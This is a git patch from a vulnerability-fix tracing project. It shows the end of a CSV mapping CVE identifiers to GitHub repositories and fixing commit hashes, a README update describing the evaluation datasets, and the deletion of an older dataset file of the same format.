+CVE-2019-17632;https://github.com/eclipse/jetty.project;None:None;False;cf0df6e3ffdcd64d607a35488edb5b0b75350d33,ba1fe2826d49c52f82b49bb32737a361519c0479,9e40fc9a6fbe93850233b7f03f048b1272530942; another case of "introduced by" on debian security tracker +CVE-2019-18622;https://github.com/phpmyadmin/phpmyadmin;None:None;False;ff541af95d7155d8dd326f331b5e248fea8e7111; +CVE-2019-18656;https://github.com/pimcore/pimcore;None:None;False;ca036e9f86bb5cdb3dac0930ec131e5f35e26c5f; +CVE-2019-18841;https://github.com/ankane/chartkick.js;None:None;False;3f833c2b229db140295b44074fef56428e0a8b91,b810936bbf687bc74c5b6dba72d2397a399885fa; +CVE-2019-18848;https://github.com/nov/json-jwt;None:None;False;ada16e772906efdd035e3df49cb2ae372f0f948a; +CVE-2019-18857;https://github.com/darylldoyle/svg-sanitizer;None:None;False;51ca4b713f3706d6b27769c6296bbc0c28a5bbd0; +CVE-2019-18874;https://github.com/giampaolo/psutil;None:None;False;7d512c8e4442a896d56505be3e78f1156f443465; +CVE-2019-18886;https://github.com/symfony/symfony;None:None;False;7bd4a92fc9cc15d9a9fbb9eb1041e01b977f8332,3ae3094a18a649d00d12e025da36007b5931b8d0,5ac07633314f59033dd6f975c199da2822b37533,bcfc282d42798860ac6a81c062ee6ff2ce65c80f; introduced by, but it should find also the second +CVE-2019-18887;https://github.com/symfony/symfony;None:None;False;d41bd42ad5d51e0f4d24259ec2814ccb294c3ba2,cccefe6a7f12e776df0665aeb77fe9294c285fbb,010213408e61620eb21ba5e5ef3bfba14a4ff689; +CVE-2019-18888;https://github.com/symfony/symfony;None:None;False;0b2c3a43bcedb2ae23970a78e17f81eccbbe1661,b21025b139962bfb87501b40ec43e7c3e4801435,691486e43ce0e4893cd703e221bafc10a871f365,77ddabf2e785ea85860d2720cc86f7c5d8967ed5,6be5cc75a4817657c5574553a41bdd0193d4fe51,2dfc115f6dd56fcc12a6941e8050349cc4d04dbe; +CVE-2019-18889;https://github.com/symfony/cache;None:None;False;8d5db9c0cecf8b6f79fa96583fae652224d897da; +CVE-2019-18923;https://github.com/cactus/go-camo;None:None;False;c1a5f28e28dd0b276269fe18ce1d4b794aa70655,add2d78c67fcfb9f2e78f38be35e85cf1858794d; +CVE-2019-18954;https://github.com/NetEase/pomelo;None:None;False;e0de00abf82e3306a53afc547fe0539f26fb152d,5b999c56c7244e23e5003878402a3c54ab51ed8c; +CVE-2019-18978;https://github.com/cyu/rack-cors;None:None;False;e4d4fc362a4315808927011cbe5afcfe5486f17d; +CVE-2019-18981;https://github.com/pimcore/pimcore;None:None;False;0a5d80b2593b2ebe35d19756b730ba33aa049106; +CVE-2019-18982;https://github.com/pimcore/pimcore;None:None;False;e0b48faf7d29ce43a98825a0b230e88350ebcf78; +CVE-2019-18985;https://github.com/pimcore/pimcore;None:None;False;9f2d075243a8392c114d9a8028858b9faf041e2d; +CVE-2019-18986;https://github.com/pimcore/pimcore;None:None;False;4a7bba5c3f818852cbbd29fa124f7fb09a207185; +CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; +CVE-2019-19118;https://github.com/django/django;None:None;False;11c5e0609bcc0db93809de2a08e0dc3d70b393e4,36f580a17f0b3cb087deadf3b65eea024f479c21,103ebe2b5ff1b2614b85a52c239f471904d26244,092cd66cf3c3e175acce698d6ca2012068d878fa; +CVE-2019-19212;https://github.com/Dolibarr/dolibarr;None:None;False;6431e8e16d8ca778d222097a51c927a0526c8101; was 10.0.3:10.0.4 +CVE-2019-19274;https://github.com/python/typed_ast;None:None;False;156afcb26c198e162504a57caddfe0acd9ed7dce,dc317ac9cff859aa84eeabe03fb5004982545b3b; +CVE-2019-19275;https://github.com/python/typed_ast;None:None;False;dc317ac9cff859aa84eeabe03fb5004982545b3b; +CVE-2019-19316;https://github.com/hashicorp/terraform;None:None;False;6db3cf8e5b4cfb2a3cd1d99a813b50b2d5d363bb; commit is outside the time interval +CVE-2019-19325;https://github.com/silverstripe/silverstripe-framework;None:None;False;ad1b00ec7dc1589a05bfc7f5f8207489797ef714,49fda52b12ba59f0a04bcabf78425586a8779e89; +CVE-2019-19507;https://github.com/manvel-khnkoyan/jpv;None:None;False;fdab85599fd92aea87af35fb4c52ba26ccbdd427; +CVE-2019-19576;https://github.com/getk2/k2;None:None;False;d1344706c4b74c2ae7659b286b5a066117155124; +CVE-2019-19619;https://github.com/documize/community;None:None;False;a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3; +CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; +CVE-2019-19703;https://github.com/ktorio/ktor;None:None;False;0c108156f45423d09014b47be810188629cb878f; +CVE-2019-19794;https://github.com/miekg/dns;None:None;False;8ebf2e419df7857ac8919baa05248789a8ffbf33; +CVE-2019-19844;https://github.com/django/django;None:None;False;f4cff43bf921fcea6a29b726eb66767f67753fa2,4d334bea06cac63dc1272abcec545b85136cca0e,302a4ff1e8b1c798aab97673909c7a3dfda42c26,5b1fbcef7a8bec991ebe7b2a18b5d5a95d72cb70; +CVE-2019-19919;https://github.com/handlebars-lang/handlebars.js;None:None;False;2078c727c627f25d4a149962f05c1e069beb18bc,213c0bbe3c4bd83a534d67384e5afa0000347ff6; +CVE-2019-20330;https://github.com/FasterXML/jackson-databind;None:None;False;fc4214a883dc087070f25da738ef0d49c2f3387e; +CVE-2019-20444;https://github.com/netty/netty;None:None;False;745814b382e828c344aeff2ab4fd9530fbb7cdfe,a7c18d44b46e02dadfe3da225a06e5091f5f328e; +CVE-2019-1000005;https://github.com/mpdf/mpdf;None:None;False;20ff6399433c18233f31817ba2f35a86dd9d5e22; commit is outside the time interval +CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;f151f920f439d97d4103fc11057ed6dc34fe98be,29ff0838a40f58efe30a4bbcea95aa8dab7da475; +CVE-2019-1000021;https://github.com/poezio/slixmpp;None:None;False;7cd73b594e8122dddf847953fcfc85ab4d316416; +CVE-2019-1002101;https://github.com/kubernetes/kubernetes;None:None;False;47063891dd782835170f500a83f37cc98c3c1013,ee7edb77659902afbe2f7b872159cf9f952a8e23,b18e16e5ca330fccaef34798cabf64fd9f23409b,c14a780d3af9f3b66e561ce0d7380e18e8fa1bf9,185dec7f90110c29353dac4609684470349f4b6e,38a3162748adb2ca733fd4de9558fc77f60cfa8e,972b75de1377aff7a5cdba82ac4c86fdd32da07b,2f9ad66eaca587e516d5edd5edd070efc118b31f; introduced by... +CVE-2019-1010142;https://github.com/secdev/scapy;None:None;False;0d7ae2b039f650a40e511d09eb961c782da025d9,905c80d6ed435477224c53de8850f763b04d495d; +CVE-2019-1010266;https://github.com/lodash/lodash;None:None;False;5c08f18d365b64063bfbfa686cbb97cdd6267347; +CVE-2019-1010306;https://github.com/stevegraham/slanger;None:None;False;f26f80c675dc4d853bce401743779a6959981af1,5267b455caeb2e055cccf0d2b6a22727c111f5c3; +CVE-2019-1020012;https://github.com/parse-community/parse-server;None:None;False;8709daf698ea69b59268cb66f0f7cee75b52daa5; +CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; +CVE-2020-1928;https://github.com/apache/nifi;None:None;False;34f2a592df8996b5f9e65039a35ecd8c31417fbd; +CVE-2020-1935;https://github.com/apache/tomcat;None:None;False;702bf15bea292915684d931526d95d4990b2e73d,ae8c82eff96990878e79691819ae941538ee62fd,8fbe2e962f0ea138d92361921643fe5abe0c4f56,8bfb0ff7f25fe7555a5eb2f7984f73546c11aa26,b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,060ecc5eb839208687b7fcc9e35287ac8eb46998; last three not correct from tracer +CVE-2020-1937;https://github.com/apache/kylin;None:None;False;e373c64c96a54a7abfe4bccb82e8feb60db04749,1f9f44ceb818b46518176e81c6dea5a0d12750cf; +CVE-2020-1938;https://github.com/apache/tomcat;None:None;False;f7180bafc74cb1250c9e9287b68a230f0e1f4645,0f725b323a74b64cdb35fce04b54427582ad6063,15cd78c528425c693f1d2b51057f32d3d63d360a,b99fba5bd796d876ea536e83299603443842feba,0d633e72ebc7b3c242d0081c23bba5e4dacd9b72,bd5ebb63e438a253bbd9b035425ece915d3feb21,4c933d80e340b4a841a672060351b2190b326782; +CVE-2020-1940;https://github.com/apache/jackrabbit-oak;None:None;False;9b78a60d5d0c3e199c006d92590dc29d39379679,756d0387ef39dc3a7a84f6644a318e74535953e6,b615992fc5202046e9479a29d6a7bd41d6258d09,3e1c6e13b67331710a1747223d8e6ee22c5fae9c,21a47b758bb24b1327c795cf421dc755f7959d2f,e7180a8d9c4f14b2de1928861dd27287e5fb59bd,138318257a57703ef6dd0f7430c115f41ffe8f85; +CVE-2020-5215;https://github.com/tensorflow/tensorflow;None:None;False;5ac1b9e24ff6afc465756edf845d2e9660bd34bf,c6170fb37c65556fda58a014d8a3235ad75f1cfc,7dc97c2704f49f20719facd1f9983c114b0b451b,e7201bae4a618ce14d4b6e11ef47fa38d7f3ffb3,54a06baa1cf13bd7057c5ce372c90f6bbe1cbc57; +CVE-2020-5219;https://github.com/peerigon/angular-expressions;None:None;False;061addfb9a9e932a970e5fcb913d020038e65667; +CVE-2020-5223;https://github.com/PrivateBin/PrivateBin;None:None;False;2caddf985f35c6b660b19ff62bb9ddd2d9f33118,4bf7f863dc2ffea1ea105e575205ab0f83ed2751,8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6; +CVE-2020-5224;https://github.com/jazzband/django-user-sessions;None:None;False;f0c4077e7d1436ba6d721af85cee89222ca5d2d9; +CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; +CVE-2020-5229;https://github.com/opencast/opencast;None:None;False;32bfbe5f78e214e2d589f92050228b91d704758e; +CVE-2020-5230;https://github.com/opencast/opencast;None:None;False;cd15f4017d9dc2836f5ffbdeeb115607501b7e97,bbb473f34ab95497d6c432c81285efb0c739f317; +CVE-2020-5232;https://github.com/ensdomains/ens;None:None;False;36e10e71fcddcade88646821e0a57cc6c19e1ecf; +CVE-2020-5233;https://github.com/oauth2-proxy/oauth2-proxy;None:None;False;0198dd6e9378405c432810e190288d796da46e4d,a316f8a06f3c0ca2b5fc5fa18a91781b313607b2; +CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; +CVE-2020-5237;https://github.com/1up-lab/OneupUploaderBundle;None:None;False;a6011449b716f163fe1ae323053077e59212350c,d59fcd2e5f675ee83c53965e16d21a942e90a9ef; +CVE-2020-5243;https://github.com/ua-parser/uap-core;None:None;False;0afd61ed85396a3b5316f18bfd1edfaadf8e88e1,a679b131697e7371f0441f4799940779efa2f27e,dd279cff09546dbd4174bd05d29c0e90c2cffa7c,7d92a383440c9742ec878273c90a4dcf8446f9af,e9a1c74dae9ecd4aa6385bd34ef6c7243f89b537; +CVE-2020-5245;https://github.com/dropwizard/dropwizard;None:None;False;d87d1e4f8e20f6494c0232bf8560c961b46db634,28479f743a9d0aab6d0e963fc07f3dd98e8c8236; +CVE-2020-5247;https://github.com/puma/puma;None:None;False;c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f,694feafcd4fdcea786a0730701dad933f7547bea,1b17e85a06183cd169b41ca719928c26d44a6e03; +CVE-2020-5249;https://github.com/puma/puma;None:None;False;c22712fc93284a45a93f9ad7023888f3a65524f3; +CVE-2020-5310;https://github.com/python-pillow/Pillow;None:None;False;4e2def2539ec13e53a82e06c4b3daf00454100c4,b9c68540dc7091c644860a7ed31ec4b79dd9363e; +CVE-2020-5311;https://github.com/python-pillow/Pillow;None:None;False;be44f0d9923485f3ed3a7a9fd479cf8cf69d814a,a79b65c47c7dc6fe623aadf09aa6192fc54548f3; +CVE-2020-5312;https://github.com/python-pillow/Pillow;None:None;False;8f0c8f731190f761180bed827d07b7a740d8555b,93b22b846e0269ee9594ff71a72bec02d2bea8fd; +CVE-2020-5313;https://github.com/python-pillow/Pillow;None:None;False;c40bc258472c83168a997a9bf4e4b5934397774a,a09acd0decd8a87ccce939d5ff65dab59e7d365b; +CVE-2020-5390;https://github.com/IdentityPython/pysaml2;None:None;False;5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25; +CVE-2020-5398;https://github.com/spring-projects/spring-framework;None:None;False;6ce19ff86138a9dd284588fb62c73af5bc97ec66,0583b334b46cf2a591c72c2708ee3d2ac5d2b58c,41f40c6c229d3b4f768718f1ec229d8f0ad76d76,956ffe68587c8d5f21135b5ce4650af0c2dea933; +CVE-2020-5529;https://github.com/HtmlUnit/htmlunit;None:None;False;934390fefcd2cd58e6d86f2bc19d811ae17bfa28; +CVE-2020-6802;https://github.com/mozilla/bleach;None:None;False;f77e0f6392177a06e46a49abd61a4d9f035e57fd,996cde7a2439a2323f9c4b2567c8b8449d393351; +CVE-2020-6816;https://github.com/mozilla/bleach;None:None;False;175f67740e7951e1d80cefb7831e6c3e4efeb986,e4e9e21e7aebff40c88fafa4319bba4636a602d9; +CVE-2020-6836;https://github.com/handsontable/formula-parser;None:None;False;396b089738d4bf30eb570a4fe6a188affa95cd5e; +CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a74c9cfbaed9f811e7563cfc3dce894928e0221a,a2697e7c6b275f05879b60f593c5854a816489f0; +CVE-2020-7219;https://github.com/hashicorp/consul;None:None;False;b788f729e9653d4a81691cbccedca2a2ac06f5ea,5531678e9eb7c5548df8fa86e9e77a573c233e46; Version mismatch, re run +CVE-2020-7596;https://github.com/codecov/codecov-node;None:None;False;f429409922cc52d0684f6e8f897363b363ed04cd,2f4eff90dd21e58dd56074dc4933b15a91373de6; +CVE-2020-7597;https://github.com/codecov/codecov-node;None:None;False;02cf13d8b93ac547b5b4c2cfe186b7d874fd234f; +CVE-2020-7598;https://github.com/minimistjs/minimist;None:None;False;38a4d1caead72ef99e824bb420a2528eec03d9ab,63e7ed05aa4b1889ec2f3b196426db4500cbda94; This repo was wrong (not existant). I expect it to not find anything +CVE-2020-7608;https://github.com/yargs/yargs-parser;None:None;False;63810ca1ae1a24b08293a4d971e70e058c7a41e2,6e36df108cd8ed6443c4d4a4536b55b6e9552b3d,c893d3072f7d31243b750b1d599b0826b8aaefa4; +CVE-2020-7981;https://github.com/alexreisner/geocoder;None:None;False;dcdc3d8675411edce3965941a2ca7c441ca48613; +CVE-2020-8116;https://github.com/sindresorhus/dot-prop;None:None;False;3039c8c07f6fdaa8b595ec869ae0895686a7a0f2,c914124f418f55edea27928e89c94d931babe587; +CVE-2020-8125;https://github.com/lukeed/klona;None:None;False;200e8d1fd383a54790ee6fc8228264c21954e38e; +CVE-2020-8131;https://github.com/yarnpkg/yarn;None:None;False;0e7133ca28618513503b4e1d9063f1c18ea318e5; +CVE-2020-8134;https://github.com/TryGhost/Ghost;None:None;False;47739396705519a36018686894d1373e9eb92216,a98579c2ef52e09349ee08f36a2a3e2e3670568a; +CVE-2020-8840;https://github.com/FasterXML/jackson-databind;None:None;False;9bb52c7122271df75435ec7e66ecf6b02b1ee14f,914e7c9f2cb8ce66724bf26a72adc7e958992497; +CVE-2020-8945;https://github.com/proglottis/gpgme;None:None;False;92153bcb59bd2f511e502262c46c7bd660e21733,d43d199046c30db9bef90de20c09843bb8b45737,d575e5df6a8359a0ad12f59a8377d362c3eb6afd,7e8c79da5ec1bd810f01f46df83a8a914e49f4fa; +CVE-2020-9281;https://github.com/ckeditor/ckeditor4;None:None;False;0e15fa67271bd2e8b165c48368968f2e908860d7; +CVE-2020-9283;https://github.com/golang/crypto;None:None;False;bac4c82f69751a6dd76e702d54b3ceb88adab236; +CVE-2020-9402;https://github.com/django/django;None:None;False;fe886a3b58a93cfbe8864b485f93cb6d426cd1f2,02d97f3c9a88adc890047996e5606180bd1c6166,26a5cf834526e291db00385dd33d319b8271fc4c,6695d29b1c1ce979725816295a26ecc64ae0e927; +CVE-2020-9546;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-9547;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-9548;https://github.com/FasterXML/jackson-databind;None:None;False;1e64db6a2fad331f96c7363fda3bc5f3dffa25bb,9f4e97019fb0dd836533d0b6198c88787e235ae2; +CVE-2020-10236;https://github.com/Froxlor/Froxlor;None:None;False;6b09720ef8a1cc008751dd0ca0140a0597fedce5; +CVE-2020-10591;https://github.com/walmartlabs/concord;None:None;False;ab32c17f85200545ed6376badc528c7df95f5adb; +CVE-2020-10594;https://github.com/Styria-Digital/django-rest-framework-jwt;None:None;False;bea6d8f4099e4794c2b74a97ff85bd0401514313,868b5c22ddad59772b447080183e7c7101bb18e0; +CVE-2020-10672;https://github.com/FasterXML/jackson-databind;None:None;False;592872f4235c7f2a3280725278da55544032f72d; +CVE-2020-10673;https://github.com/FasterXML/jackson-databind;None:None;False;1645efbd392989cf015f459a91c999e59c921b15; \ No newline at end of file From c5f8b7010186dcfae756d99f67071fd6183bfab7 Mon Sep 17 00:00:00 2001 From: I748376 Date: Thu, 18 Jul 2024 14:58:57 +0000 Subject: [PATCH 041/130] adds dataset description to readme --- prospector/evaluation/README.md | 9 +- ...acer_dataset_correct_full_unsupervised.csv | 1320 ----------------- 2 files changed, 7 insertions(+), 1322 deletions(-) delete mode 100644 prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv diff --git a/prospector/evaluation/README.md b/prospector/evaluation/README.md index a0bbdefa8..6f1447cf7 100644 --- a/prospector/evaluation/README.md +++ b/prospector/evaluation/README.md @@ -16,7 +16,7 @@ Prospector can either be run containerised or not, set this with the `run_contai The evaluation code expects data input in the form of CSV files with the following columns: `(CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS)`. First, if you have your input data saved somewhere else than `/evaluation/data/input/`, please change the `input_data_path` accordingly. -Do not put the datafile into `input/`, but rather in its own folder with a descriptive name, such as `steady-dataset/`. You can specify +Give your dataset a descriptive name, such as `steady-dataset.csv`. You can specify which dataset you would want to use when running the CL command for evaluation [(List of Command Line Options)](#command-line-options). @@ -38,4 +38,9 @@ python3 evaluation/run_multiple -i -e * `-r` or `--rules`: Perform rules analysis * `-f` or `--folder`: Specify a folder to analyze * `-c` or `--cve`: Specify a particular CVE to analyze -* `-p` or `--parallel`: Run in parallel on multiple CVEs \ No newline at end of file +* `-p` or `--parallel`: Run in parallel on multiple CVEs + + +## Exisiting Datasets + +1. `d63`: Dataset of CVEs and their fixing commits used in D6.3 of AssureMOSS. Formerly called `tracer_dataset_correct_full_unsupervised.csv`. \ No newline at end of file diff --git a/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv b/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv deleted file mode 100644 index c5f208544..000000000 --- a/prospector/evaluation/data/input/tracer_dataset_correct_full_unsupervised.csv +++ /dev/null @@ -1,1320 +0,0 @@ -ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS -CVE-2009-0217;https://github.com/mono/mono;None:None;False;b79738dc7f734a78039567ea35f4e6a7d319a227,e2be4afec1d41aacd7c0a35605e369a55c4fe3a6,939994df00fc3e1372b9dc1243e261e2f6c6c133,c20551c1942db667672b36a07856467caace2d92,8bb489774f42a734947859a1742ee5710efd9b49,c48fa75d0c8f8e16a554de988cbadcb298fce013,cbfbf2f522399692d0edf7741746e300453338ca,3b1cee23d6f2f69f8444a5a1def4051028abff5f,14846e6f2f0c8e95b3eec525ee9367bcd0; -CVE-2010-0156;https://github.com/puppetlabs/puppet;None:None;False;0aae57f91dc69b22fb674f8de3a13c22edd07128,6111ba80f2c6f6d1541af971f565119e6e03d77d; -CVE-2010-0684;https://github.com/apache/activemq;None:None;False;1f464b9412e1b1c08d40c8ffac40edd52731da48,fed39c3619825bd92990cf1aa7a4e85119e00a6e,2895197d0dad246757d8d1d9eea181cbf0543ae9,9dc43f3ffe85c9c56faee235a21f23bfceb865c8; -CVE-2010-2076;https://github.com/apache/cxf;None:None;False;63a0a674a46aa24bf020bcb3d9e71bc0ad130c64,fec9e63fda69a3ef21679cd811efa2a0c100ce95; -CVE-2010-2245;https://github.com/apache/attic-wink;None:None;False;531771e5b2bf2f470fe728efe25e471d3b23659f; vulnerable tag is fixed -CVE-2010-4534;https://github.com/django/django;None:None;False;17084839fd7e267da5729f2a27753322b9d415a0,85207a245bf09fdebe486b4c7bbcb65300f2a693,732198ed5c2a127249970e0cd4218d093a38e9a2; -CVE-2010-4535;https://github.com/django/django;None:None;False;6819be1ea17ace34ae3a5c31ab0be960e99fcb85,d5d8942a160685c403d381a279e72e09de5489a9,7f8dd9cbac074389af8d8fd235bf2cb657227b9a; -CVE-2010-5142;https://github.com/chef/chef;None:None;False;2810e43ca6c05046a9ba1392fd8163c3e617ddc1,8d6de424c7ed977b3c7f232b585ef7d63647ac51; -CVE-2010-5312;https://github.com/jquery/jquery-ui;None:None;False;7e9060c109b928769a664dbcc2c17bd21231b6f3; -CVE-2011-1772;https://github.com/apache/struts;None:None;False;885ab3459e146ff830d1f7257f809f4a3dd4493a; vulnerable tag is fixed -CVE-2011-1950;https://github.com/plone/plone.app.users;None:None;False;282ca1eb510aea43bcddf6ad005446074d29efc3; -CVE-2011-2730;https://github.com/spring-projects/spring-framework;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb,62ccc8dd7e645fb91705d44919abac838cb5ca3f; fixed tag is vulnerable v3.2.0.RELEASE is the first containing the fix in theory -CVE-2011-2732;https://github.com/spring-projects/spring-security;None:None;False;f5fbda42e5f494f1a8aa96a0f8b35d60a4f57556,a087e828a63edf0932e4eecf174cf816cbe6a58a,5238ba0e2615ef733a906b264c6c06a4446a886b; -CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; -CVE-2011-2929;https://github.com/rails/rails;None:None;False;5f94b93279f6d0682fafb237c301302c107a9552,e0c03f8a2e727619c1eb1822d100d8c920d8bf12,09ad48f22e0b32b6485bc122f7f220045aed1198; -CVE-2011-2930;https://github.com/rails/rails;None:None;False;8a39f411dc3c806422785b1f4d5c7c9d58e4bf85,f9b642cb15d37c9fc76c98ba4c11fa181b730178,fb4747bcf1659a94d76ac221d66ce44148ca7b49,6b46d655978ace0a6cfa6ad8b814d97c86a8830f; -CVE-2011-2931;https://github.com/rails/rails;None:None;False;586a944ddd4d03e66dea1093306147594748037a,3480d97b6c9f657ca1d0f11ac1e3e17baf84cdb2,66c3e31dcf314ab0fcabe717576d0b606c685d0e,60f783d9cedb151230074c216b338267e288d72d; -CVE-2011-2932;https://github.com/rails/rails;None:None;False;bfc432574d0b141fd7fe759edfe9b6771dd306bd,a19ee5cfd35fe85fd065be30de5af6b20363b682; -CVE-2011-3186;https://github.com/rails/rails;None:None;False;11dafeaa7533be26441a63618be93a03869c83a9; -CVE-2011-3848;https://github.com/puppetlabs/puppet;None:None;False;fe2de817b43a427a3c6fd629c5e13949b222ac34,c275a518d10bc9ef87d330c052cdc3d6f4241942,47135fbea8004f49c3255ae2052cb2357b325300; -CVE-2011-3869;https://github.com/puppetlabs/puppet;None:None;False;7d4c169df84fc7bbeb2941bf995a63470f71bdbd,2775c21ae48e189950dbea5e7b4d1d9fa2aca41c,e7a69952c052e89acc5b57a51ac0680a7a9a5977; -CVE-2011-3870;https://github.com/puppetlabs/puppet;None:None;False;b29b1785d543a3cea961fffa9b3c15f14ab7cce0,88512e880bd2a03694b5fef42540dc7b3da05d30; -CVE-2011-3871;https://github.com/puppetlabs/puppet;None:None;False;d76c30935460ded953792dfe49f72b8c5158e899,343c7bd381b63e042d437111718918f951d9b30d; -CVE-2011-3872;https://github.com/puppetlabs/puppet;None:None;False;94345ebac6d79a890efc5f49e136c4f76ddda3ef,bab9310d2800dd3c24e002f9d85c808ee38c9d3c,e4ee7947fd58e4fc49c5bce484cce7b5f60470ae,9ee12151e9c83d2b477ea5b04dd7d52e749a6992; -CVE-2011-3923;https://github.com/apache/struts;None:None;False;2c1eb6bb57f90db7287fc3ed0086793d0a43fe9e; -CVE-2011-4030;https://github.com/plone/Products.CMFEditions;None:None;False;d55add52e5900967c8cc78becc6790048f02015b; -CVE-2011-4104;https://github.com/django-tastypie/django-tastypie;None:None;False;e8af315211b07c8f48f32a063233cc3f76dd5bc2,be245106125961a322f935195c1d3bca6f978bfe; -CVE-2011-4461;https://github.com/eclipse/jetty.project;None:None;False;085c79d7d6cfbccc02821ffdb64968593df3e0bf; -CVE-2011-4838;https://github.com/jruby/jruby;None:None;False;f007944b459e7c5e33b8296433d8b9d704bf02cc,cc77504eda2546a36d3ca45d30e9dc3cc7a38bf6,c1c9f95ed29cb93806fbc90e9eaabb9c406581e5; -CVE-2011-5036;https://github.com/rack/rack;None:None;False;5b9d09a81a9fdc9475f0ab0095cb2a33bf2a8f91,e8fb5045fd9a28386425975b57414d46471a5263,09c5e53f11a491c25bef873ed146842f3cd03228,bf4b55ccfbe53f967d0bd52807eeb499ff4f9654; -CVE-2011-5097;https://github.com/chef/chef;None:None;False;a4ea6edab2fecb922f999cffb0daa04eeeec7a26,4402493061cdce76495d2408c8a9331c530c6cbf; -CVE-2011-5098;https://github.com/chef/chef;None:None;False;33f0e9c58bbf047e1b401a834f3abfe72d9a8947,7a09597360c256f6164047b62782a2a1e0a3d68a; -CVE-2012-0392;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed -CVE-2012-0394;https://github.com/apache/struts;None:None;False;b4265d369dc29d57a9f2846a85b26598e83f3892,5f54b8d087f5125d96838aafa5f64c2190e6885b; vulnerable tag is fixed -CVE-2012-0881;https://github.com/apache/xerces2-j;None:None;False;992b5d9c24102ad20330d36c0a71162753a37449; -CVE-2012-1054;https://github.com/puppetlabs/puppet;None:None;False;146953861e007a91545fdbd0ea59ab3509326e09,0c967037ec8305aceb81f0a3e5d2969054bce2e2; -CVE-2012-1098;https://github.com/rails/rails;None:None;False;9435f5a479317458c558ae743b7d876dd5a5db20,d1fc35fe196ee2913bc34e5c581a5284610d05d1,c60c1c0812d5eb55e7024db350f8bc5b6729f7fe; -CVE-2012-1099;https://github.com/rails/rails;None:None;False;1be2bbec310ffe94061cca7ba0e3c1a478af03af,7b73913701ff41981d166ca457e41690aac3bce3,5b4082fddf3412aef6c085fbb2a13fd3bbc75f4e; -CVE-2012-1109;https://github.com/pediapress/mwlib;None:None;False;aa987c281c10e29f26aa0faa21c04f3bb1167fde; -CVE-2012-1176;https://github.com/pediapress/pyfribidi;None:None;False;d2860c655357975e7b32d84e6b45e98f0dcecd7a; -CVE-2012-1906;https://github.com/puppetlabs/puppet;None:None;False;c51447dfa81c9751fdc7663e0e91a9c9238abcaa,46e8dc06aa31426ec3bf5203e46107d72a9ba398; -CVE-2012-1986;https://github.com/puppetlabs/puppet;None:None;False;0d6d29933e613fe177e9235415919a5428db67bc,568ded50ec6cc498ad32ff7f086d9f73b5d24c14; -CVE-2012-1987;https://github.com/puppetlabs/puppet;None:None;False;91e7ce478649490d87684661f79d70b5ca46ddd0,568ded50ec6cc498ad32ff7f086d9f73b5d24c14,0d6d29933e613fe177e9235415919a5428db67bc; -CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;8f702469cbf4c451b6dea349290bc4af0f6f76c7,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e; -CVE-2012-2139;https://github.com/mikel/mail;None:None;False;29aca25218e4c82991400eb9b0c933626aefc98f,ac56f03bdfc30b379aeecd4ff317d08fdaa328c2; -CVE-2012-2378;https://github.com/apache/cxf;None:None;False;9bb4612d3352ef3e3292fdce25e3c70b43d63c6f; -CVE-2012-2379;https://github.com/apache/cxf;None:None;False;440528d928be1e2030e7227b958c9c072847d9b2,4500bf901cb2a7312291b6663045f28a95d2a0c4; -CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; -CVE-2012-2660;https://github.com/rails/rails;None:None;False;060c91cd59ab86583a8f2f52142960d3433f62f5,5b83bbfab7d5770ed56366d739ff62ac70425008,dff6db18840e2fd1dd3f3e4ef0ae7a9a3986d01d; -CVE-2012-2661;https://github.com/rails/rails;None:None;False;9340f89849606dba02f44038171f3837f883fd4e,99f030934eb8341db333cb6783d0f42bfa57358f,b71d4ab9d7d61ebe3411a8754e9fe93d3587704e,71f7917c553cdc9a0ee49e87af0efb7429759718,176af7eff2e33b331c92febbeda98123da1151f3,8355abf153615a717c0d0e4a58b2bfca39b35025,cc2903da9f13c26ba3d94c149f31d4c53b94b2ed; -CVE-2012-3366;https://github.com/Bcfg2/bcfg2;None:None;False;a524967e8d5c4c22e49cd619aed20c87a316c0be; -CVE-2012-3408;https://github.com/puppetlabs/puppet;None:None;False;ab9150baa1b738467a33b01df1d90e076253fbbd; -CVE-2012-3451;https://github.com/apache/cxf;None:None;False;deeeaa95a861b355068ca6febc7aa02a4a8c51e5,878fe37f0b09888a42005fedc725ce497b5a694a,7230648f96573820d5bfa82c92c637391b448897,9c70abe28fbf2b4c4df0b93ed12295ea5a012554; -CVE-2012-3458;https://github.com/bbangert/beaker;None:None;False;91becae76101cf87ce8cbfabe3af2622fc328fe5; 